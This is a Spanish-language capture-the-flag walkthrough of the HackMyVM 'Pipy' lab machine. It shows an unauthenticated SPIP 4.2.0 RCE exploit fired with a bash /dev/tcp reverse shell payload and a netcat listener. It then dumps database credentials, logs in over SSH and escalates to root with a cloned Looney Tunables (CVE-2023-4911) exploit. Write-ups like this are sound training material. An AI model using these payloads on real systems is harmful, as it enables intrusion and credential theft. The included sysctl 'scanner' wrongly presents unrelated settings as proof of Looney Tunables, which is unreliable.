Pipy HackMyVM (Easy - Linux)
Escaneo de puertos
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn <IP>nmap -sCV -p<PORTS> <IP>Info:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-15 03:21 EDT
Nmap scan report for 192.168.5.58
Host is up (0.00046s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 c0:f6:a1:6a:53:72:be:8d:c2:34:11:e7:e4:9c:94:75 (ECDSA)
|_ 256 32:1c:f5:df:16:c7:c1:99:2c:d6:26:93:5a:43:57:59 (ED25519)
80/tcp open http Apache httpd 2.4.52 ((Ubuntu))
|_http-generator: SPIP 4.2.0
|_http-title: Mi sitio SPIP
|_http-server-header: Apache/2.4.52 (Ubuntu)
MAC Address: 08:00:27:9F:B1:96 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.50 secondsVeremos que tendremos un puerto 80 en el que aloja una pagina web, si entramos dentro de la misma veremos una pagina web normal con el software llamado spip, por lo que vamos a realizar un poco de fuzzing empezando con ver la tecnologia web que lleva por detras y que versiones tiene la misma.
Whatweb
whatweb http://<IP>/Info:
http://192.168.5.58/ [200 OK] Apache[2.4.52], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.52 (Ubuntu)], IP[192.168.5.58], JQuery, MetaGenerator[SPIP 4.2.0], SPIP[4.2.0][http://192.168.5.58/local/config.txt], Script[text/javascript], Title[Mi sitio SPIP], UncommonHeaders[composed-by,x-spip-cache]Por lo que vemos en esta linea...
MetaGenerator[SPIP 4.2.0]Dicho software esta utilizando la version 4.2.0, vamos a investigar si dicha version es vulnerable a algo.
Escalate user www-data
Si buscamos bien veremos que si lo es, justamente en ExploitDB veremos un exploit asociado a dicha vulnerabilidad en la que se puede realizar un RCE de forma no autenticada, por lo que vamos a utilizarlo.
URL = Exploit SPIP 4.2.0
Una vez que nos lo hayamos descargado el archivo, vamos a utilizarlo de la siguiente forma:
python3 51536.py -u http://<IP>/ -c 'bash -c "bash -i >& /dev/tcp/<IP>/<PORT> 0>&1"'Antes de enviarlo nos pondremos a al escucha de esta forma:
nc -lvnp <PORT>Ahora si lo enviamos y volvemos a donde tenemos la escucha, veremos lo siguiente:
listening on [any] 7777 ...
connect to [192.168.5.50] from (UNKNOWN) [192.168.5.58] 43634
bash: cannot set terminal process group (840): Inappropriate ioctl for device
bash: no job control in this shell
www-data@pipy:/var/www/html$ whoami
whoami
www-dataVeremos que ha funcioando, por lo que sanitizaremos la shell.
Sanitización de shell (TTY)
script /dev/null -c bash# <Ctrl> + <z>
stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=/bin/bash
# Para ver las dimensiones de nuestra consola en el Host
stty size
# Para redimensionar la consola ajustando los parametros adecuados
stty rows <ROWS> columns <COLUMNS>Escalate user
Si nos vamos a la home del usuario www-data que es /usr/www/ podremos ver los siguiente archivos:
total 20
drwxr-xr-x 4 www-data www-data 4096 Oct 5 2023 .
drwxr-xr-x 14 root root 4096 Oct 2 2023 ..
-rw------- 1 www-data www-data 130 Oct 5 2023 .bash_history
drwxrwxrwx 3 www-data www-data 4096 Oct 5 2023 .local
drwxr-xr-x 11 www-data www-data 4096 Oct 4 2023 htmlEsto suele ser muy poco comun, vamos a ver el .bash_history a ver que contiene:
whoami
exit
exit
reset xterm
export TERM=xterm-256color
stty rows 51 cols 197
ls
nano
ls
cat config/connect.php
mysql -u root -p Vemos que ha realizado una conexion a mysql, pero antes a leido un archivo que contiene la carpeta /html por lo que vamos a leerlo:
cat /usr/www/html/config/connect.phpInfo:
<?php
if (!defined("_ECRIRE_INC_VERSION")) return;
defined('_MYSQL_SET_SQL_MODE') || define('_MYSQL_SET_SQL_MODE',true);
$GLOBALS['spip_connect_version'] = 0.8;
spip_connect_db('localhost','','root','dbpassword','spip','mysql', 'spip','','');Vemos bastantes cosas interesantes, entre ellas las credenciales para conectarnos por mysql por lo que haremos lo siguiente:
mysql -h localhost -u root -pdbpasswordInfo:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 64
Server version: 10.6.12-MariaDB-0ubuntu0.22.04.1 Ubuntu 22.04
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]>Con esto ya estaremos dentro, por lo que vamos a investigar un poco.
show databases;Info:
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| spip |
| sys |
+--------------------+
5 rows in set (0.049 sec)Vamos a seleccionar la llamada spip que es la que no viene por defecto.
use spip
show tables;Info:
+-------------------------+
| Tables_in_spip |
+-------------------------+
| spip_articles |
| spip_auteurs |
| spip_auteurs_liens |
| spip_depots |
| spip_depots_plugins |
| spip_documents |
| spip_documents_liens |
| spip_forum |
| spip_groupes_mots |
| spip_jobs |
| spip_jobs_liens |
| spip_meta |
| spip_mots |
| spip_mots_liens |
| spip_paquets |
| spip_plugins |
| spip_referers |
| spip_referers_articles |
| spip_resultats |
| spip_rubriques |
| spip_syndic |
| spip_syndic_articles |
| spip_types_documents |
| spip_urls |
| spip_versions |
| spip_versions_fragments |
| spip_visites |
| spip_visites_articles |
+-------------------------+
28 rows in set (0.000 sec)De todas estas tablas la que mas nos interesa es la llamada spip_auteurs que es como la que contiene los usuarios, por lo que vamos a ver dicha informacion de la misma.
select * from spip_auteurs;Info:
+-----------+--------+-----+-----------------+----------+----------+--------+--------------------------------------------------------------+---------+-----------+-----------+---------------------+-----+--------+---------------------+-----------------------------------+----------------------------------+---------------------------------------------------------------------------------------------------------------------+------------------------------------------------------------------------------------------------------------------------------------------------------+--------+------+----------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| id_auteur | nom | bio | email | nom_site | url_site | login | pass | low_sec | statut | webmestre | maj | pgp | htpass | en_ligne | alea_actuel | alea_futur | prefs | cookie_oubli | source | lang | imessage | backup_cles |
+-----------+--------+-----+-----------------+----------+----------+--------+--------------------------------------------------------------+---------+-----------+-----------+---------------------+-----+--------+---------------------+-----------------------------------+----------------------------------+---------------------------------------------------------------------------------------------------------------------+------------------------------------------------------------------------------------------------------------------------------------------------------+--------+------+----------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| 1 | Angela | | angela@pipy.htb | | | angela | 4ng3l4 | | 0minirezo | oui | 2023-10-04 17:28:39 | | | 2023-10-04 13:50:34 | 387046876651c39a45bc836.13502903 | 465278670651d6da4349d85.01841245 | a:4:{s:7:"couleur";i:2;s:7:"display";i:2;s:18:"display_navigation";s:22:"navigation_avec_icones";s:3:"cnx";s:0:"";} | NULL | spip | | | 3HnqCYcjg+hKOjCODrOTwhvDGXqQ34zRxFmdchyPL7wVRW3zsPwE6+4q0GlAPo4b4OGRmzvR6NNFdEjARDtoeIAxH88cQZt2H3ENUggrz99vFfCmWHIdJgSDSOI3A3nmnfEg43BDP4q9co/AP0XIlGzGteMiSJwc0fCXOCxzCW9NwvzJYM/u/8cWGGdRALd7fzFYhOY6DmokVnIlwauc8/lwRyNbam1H6+g5ju57cI8Dzll+pCMUPhhti9RvC3WNzC2IUcPnHEM= |
| 2 | admin | | admin@pipy.htb | | | admin | $2y$10$.GR/i2bwnVInUmzdzSi10u66AKUUWGGDBNnA7IuIeZBZVtFMqTsZ2 | | 1comite | non | 2023-10-04 17:31:03 | | | 2023-10-04 17:31:03 | 1540227024651d7e881c21a5.84797952 | 439334464651da1526dbb90.67439545 | a:4:{s:7:"couleur";i:2;s:7:"display";i:2;s:18:"display_navigation";s:22:"navigation_avec_icones";s:3:"cnx";s:0:"";} | 1118839.6HqFdtVwUs3T6+AJRJOdnZG6GFPNzl4/wAh9i0D1bqfjYKMJSG63z4KPzonGgNUHz+NmYNLbcIM83Tilz5NYrlGKbw4/cDDBE1mXohDXwEDagYuW2kAUYeqd8y5XqDogNsLGEJIzn0o= | spip | fr | oui | |
+-----------+--------+-----+-----------------+----------+----------+--------+--------------------------------------------------------------+---------+-----------+-----------+---------------------+-----+--------+---------------------+-----------------------------------+----------------------------------+---------------------------------------------------------------------------------------------------------------------+------------------------------------------------------------------------------------------------------------------------------------------------------+--------+------+----------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
2 rows in set (0.000 sec)Veremos bastantes usuarios en ella, pero el usuario que mas nos interesa es el llamado angela ya que es el unico usuario que tiene la contraseña en texto plano y que esta en el sistema.
angela:4ng3l4Vamos a conectarnos por SSH para obtener una shell mas limpia.
SSH
ssh angela@<IP>Metemos como contraseña 4ng3l4 y veremos que estaremos dentro, por lo que leeremos la flag del usuario.
user.txt
dab37650d43787424362d5805140538dEscalate Privileges
Si investigamos tenemos con permisos SUID el siguiente binario:
263043 32 -rwsr-xr-x 1 root root 30872 Feb 26 2022 /usr/bin/pkexecCon esto podremos ser root directamente ya que tiene una vulnerabilidad en la que se puede ejecutar una shell directamente como root, pero vamos hacerlo como el creador lo ha creado.
Si investigamos un poco, veremos que el kernel tiene la siguiente version.
uname -rInfo:
5.15.0-84-genericVemos que es una version de kernel un poco baja, por lo que pude ser vulnerable a explotaciones dentro del mismo, vamos a probar con un exploit bastante conocido para esto.
URL = Exploit DirtyPipe Kernel
Si vemos en esa pagina, veremos que el rango de versiones vulnerables esta dentro la nuestra, por lo que vamos a probarlo.
Pero sin suerte, no va a funcionar, investigando mucho y mirando otros writeups vi que es vulnerable a lo que se le llama Looney Tunables por lo que vamos a ver si es o no realmente vulnerable con un script.
scann_Looney_Tunables.sh
#!/bin/bash
declare -A checks=(
[kernel.dmesg_restrict]=1
[kernel.yama.ptrace_scope]=1
[fs.suid_dumpable]=0
[kernel.unprivileged_bpf_disabled]=1
[net.ipv4.conf.all.accept_redirects]=0
[net.ipv4.conf.all.send_redirects]=0
[net.ipv4.conf.all.accept_source_route]=0
)
vulnerable=0
for param in "${!checks[@]}"; do
current=$(sysctl -n $param 2>/dev/null)
if [ "$current" != "${checks[$param]}" ]; then
echo "⚠️ $param = $current (Inseguro, debería ser ${checks[$param]})"
vulnerable=1
else
echo "✅ $param = $current (Seguro)"
fi
done
if [ $vulnerable -eq 1 ]; then
echo -e "\n⚠️ Tu sistema tiene configuraciones inseguras (Looney Tunables vulnerables)."
else
echo -e "\n✅ Tu sistema está configurado de forma segura para estos parámetros."
fiAhora lo ejecutaremos de esta forma:
bash scann_Looney_Tunables.shInfo:
⚠ net.ipv4.conf.all.accept_redirects = 1 (Inseguro, debería ser 0)
✅ kernel.dmesg_restrict = 1 (Seguro)
✅ kernel.yama.ptrace_scope = 1 (Seguro)
⚠ kernel.unprivileged_bpf_disabled = 2 (Inseguro, debería ser 1)
⚠ fs.suid_dumpable = 2 (Inseguro, debería ser 0)
✅ net.ipv4.conf.all.accept_source_route = 0 (Seguro)
⚠ net.ipv4.conf.all.send_redirects = 1 (Inseguro, debería ser 0)
⚠ Tu sistema tiene configuraciones inseguras (Looney Tunables vulnerables).Veremos que efectivamente es vulnerable, por lo que vamos a descargarnos un exploit para aprovechar esto mismo.
URL = Exploit Looney Tunables
En este GitHub podremos ver que hay otra forma de comprobar si es vulnerable o no a este exploit y es ejecutando el siguiente comando:
env -i "GLIBC_TUNABLES=glibc.malloc.mxfast=glibc.malloc.mxfast=A" "Z=`printf '%08192x' 1`" /usr/bin/su --helpInfo:
Segmentation fault (core dumped)Por lo que vemos si lo es, ya que nos esta diciendo que se salio de la memoria dicha informacion y esto se debe a que se puede realizar un Buffer Overflow para obtener privilegios de root.
Vamos a descargarnos el repositorio, ya que la maquina victima tiene git.
git clone https://github.com/hadrian3689/looney-tunables-CVE-2023-4911.gitUna vez echo esto, vamos a ejecutar lo siguiente de esta forma ordenada.
chmod +x libc.py
python3 libc.py
gcc exp.c -o expY ahora vamos a ejecutar dicho binario.
./expInfo:
try 100
try 200
try 300
try 400
try 500
try 600
# whoami
rootComo veremos ha funcionado, esto puede tardar un buen rato, ya que va probando realizando varios intentos, pero al final acabamos obteniendo la shell como el usuario root, por lo que leeremos la flag de root.
root.txt
ab55ed08716cd894e8097a87dafed016Last updated